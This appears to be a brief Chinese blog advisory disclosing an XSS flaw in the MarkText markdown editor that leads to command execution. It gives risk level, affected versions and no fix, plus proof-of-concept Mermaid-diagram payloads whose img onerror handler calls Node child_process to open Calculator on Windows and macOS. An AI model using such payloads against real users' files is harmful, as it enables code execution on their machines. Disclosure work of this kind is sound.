marktext编辑器XSS触发RCE命令执行

2023-10-28 11:32:46

marktext编辑器XSS触发RCE命令执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

marktext编辑器XSS触发RCE命令执行

风险等级

高危

影响版本

marktext目前所有版本均受影响

资产确定

https://marktext.app/

漏洞验证

windows

```mermaid
sequenceDiagram
 B ->> S: <img src=1 one rror="require('child_process').execSync('c:\\windows\\system32\\calc.exe')">
 hello ->> B:

mac

```mermaid
sequenceDiagram
 B ->> S: <img src=1 one rror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello ->> B:

marktext编辑器XSS触发RCE命令执行

修复方案

目前尚未修复

上一篇:VLAN实验(2)


下一篇:MiniCMS-1.10审计